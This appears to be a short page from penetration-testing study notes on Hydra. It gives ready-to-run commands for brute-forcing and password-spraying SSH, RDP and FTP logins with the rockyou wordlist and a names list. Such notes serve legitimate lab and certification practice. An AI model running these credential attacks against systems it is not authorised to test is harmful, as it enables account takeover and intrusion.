Hydra

For SSH Connection Brute Force

This is better than Netexec or crackmapexec when sprearing password as it handles the error automatically.

# Example:
# See help for more details 
# Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [-m MODULE_OPT] [service://server[:PORT][/OPT]]
hydra -l offsec -P /usr/share/wordlists/rockyou.txt  ssh://$IP -v

# Use '-I' to not resume from old session data.
# Use '-s' to specify custom or different port.

For RDP Connection Brute Force

# Example:
# In this we are guessing the names for found password. (Similar to password spraying)
hydra -L /usr/share/wordlists/dirb/others/names.txt -p "SuperS3cure1337#" rdp://$IP

# Use '-I' to not resume from old session data.
# Use '-s' to specify custom or different port.

For FTP Connection Brute Force

# Example:
hydra -l itadmin -P /usr/share/wordlists/rockyou.txt ftp://$IP

PreviousCracking ZIP File NextHTTP POST Login Form

Last updated 1 year ago